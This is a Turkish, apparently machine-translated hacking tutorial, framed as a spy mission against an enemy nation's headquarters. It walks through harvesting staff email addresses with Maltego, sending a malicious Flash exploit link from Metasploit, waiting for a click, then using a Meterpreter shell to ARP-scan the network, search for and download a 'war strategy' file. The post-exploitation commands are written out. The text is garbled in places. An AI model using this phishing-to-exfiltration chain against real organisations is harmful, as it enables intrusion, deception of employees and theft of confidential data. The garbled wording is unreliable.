Bu yazıda, düşmanımızın bilgisayarlarına saldıracağız ve milletimizin egemenlik bütünlüğünü tehlikeye atabilecek gelecekteki savaş planlarını gösterecek gizli belgeleri arayacağız. Düşmanımızın gizlice askerler ve istihbarat ajanları ülkemize gizlediğini ve özgürlük savaşçıları olduklarını iddia ediyor. (Ses tanıdık mı?)
Görevimiz, askeri liderlerinin bilgisayarlarına saldırmak ve bu özgürlük savaşçılarının aslında askerlerimiz ve muhaliflerimizin aracıları olduklarını, ancak çok güçlü komşularının kanıtlarını bulmaktır. Bilgileri bulmak zorunda kalmamakla birlikte, liderlerine ve belki de dünyaya kötü niyet ve hareketlerinin kanıtlarını gösterebilmemiz için bir kopyasını indirmeliyiz.
Stratejimiz birisinin bilgisayarını karargahtan ödün vermeye çalışmak olacaktır - başkaları. Bilgisayarlarını tehlikeye attıktan sonra , oradan ağdaki herhangi bir bilgisayara pivot yapıp daha sonra gizli dosyaları ararız ve bulduklarımızı bilgisayarınıza geri aktarabiliriz.
Ulusumuzun hayatta kalması için bu kritik ve tehlikeli göreve başlayalım!
Exploit Stratejimizi Belirleyin
Daha önce gördüğümüz gibi, Adobe Flash Player neredeyse herkesin bilgisayarında en savunmasız uygulamalar arasında yer alıyor. Bir tarayıcı kullanıyorsanız, muhtemelen bilgisayarınızda Adobe Flash Player'ı bulursunuz. Bu da çok cazip bir hedef.
Daha önceki bir öğretmende , Windows XP SP3, Windows 7 SP1 ve Windows 8 üzerinde Internet Explorer 6-11 ile Flash 11-13 olan neredeyse her bilgisayarda Adobe Flash Player'ı nasıl kullanabileceğimizi gösterdim. Bu, hedeflerin oldukça geniş bir fırçalamasıdır. Bu iş için mükemmeldir!
Tek dezavantajı, bir başkasını kötü niyetli bir bağlantıya tıklaması gerektiğidir. Herkes uyarmamasına rağmen, insanlar her gün bildiklerini düşündüğü birinden bir e-posta aldıklarında veya e-posta yeterince cazip gelse bile bunu yapıyor. Bunu yapmış olsan bile.
Hasat E-posta Adresleri
Merkezin tamamında, tüm şebekeyi devre dışı bırakmak için bağlantımızı tıklatmamız için yalnızca bir kişiye ihtiyacımız var. İlk adımımız olarak, Maltego'yu kullanarak merkezden e-posta adreslerini toplayalım.
[IMG]https://img.wonderhowto.com/img/04/26/63560400530465/0/hack-like-pro-spy-anyone-part-2-finding-downloading-confidential-********s.w1456.jpg[/IMG]
E-postayı Bağlantı ile Gönderebilirsiniz
Şimdi, düşmanın merkezindeki çalışanların e-postalarına sahibiz, kötü niyetli kodu ****sploit'ta üretelim ve sunucumuzu koduyla başlatalım .
[IMG]https://img.wonderhowto.com/img/14/14/63560400543418/0/hack-like-pro-spy-anyone-part-2-finding-downloading-confidential-********s.w1456.jpg[/IMG]
Sunucumuz kötü niyetli kod ile dolduğuna göre, bu bağlantıya sahip olan e-postaları Maltego ile bulduğumuz tüm çalışanlara gönderelim.
Şimdi ... Bekle
Bazen en iyi tavsiye sadece sabırlı olmaktır. E-postaları merkezdeki tüm çalışanlara gönderdik ve şu an sabredip birilerinin gönderilen bağlantıyı tıklamasını beklememiz yeterlidir.
Başarı!
Yaklaşık 48 saat bekledik, ama nihayet başardık! Birisi bağlantısına tıkladı ve sistemlerinde bir Metrepreter kabuğu oluşturduk.
[IMG]https://img.wonderhowto.com/img/20/44/63560400554793/0/hack-like-pro-spy-anyone-part-2-finding-downloading-confidential-********s.w1456.jpg[/IMG]
Ağ üzerinden Pivot
Artık ağ üzerinde bir makineye sahibiz, ağdaki her makineyi bulmak için bir ARP taraması yapabiliriz . Bu, ağdaki her makinenin IP adresini ve MAC adresini bize verecektir.
Kod:
meterpreter > run arp_scan -r 192.168.1.0/24
Ardından, ağ üzerindeki tüm sistemlere erişebilmemiz için pivot yapabiliriz.
Bakalım
Bu ağda yalnızca iki sistem bulduğumuzdan, başkalarına geçmeden önce tehlikeye attığımız makinenin içine bakalım. Aradığımız belgenin muhtemelen "savaş stratejisi" olduğunu biliyoruz. Metrepreterde yer alan arama komutunu kullanarak, ödün verilmiş sistemin tüm sabit diskini arayabiliriz.
Kod:
meterpreter > search -f "war strategy.txt"
Harika ! C: \ gizlilik dizininde bulduk!
İndirin
Aradığımız belgeye sahip olduğumuza göre, hedefin bilgisayarından kendimizinkine indirelim.
Kod:
meterpreter > download c:\\confidential\\"war strategy.txt"
Son olarak dosyanın sistemimize gelip gelmediğini kontrol edelim. Meterpreter , dosyayı msfconsole'u çağırdığımız son çalışma dizinine gönderir . Bu durumda, / root oldu . Yani, geri dönelim bizim Kali sisteminde , bir terminal açın ve gidin / root ve "savaşın strategy.txt" dosya geldi olmadığını görmek.
Kod:
kali > cd /root
Kod:
kali> ls -l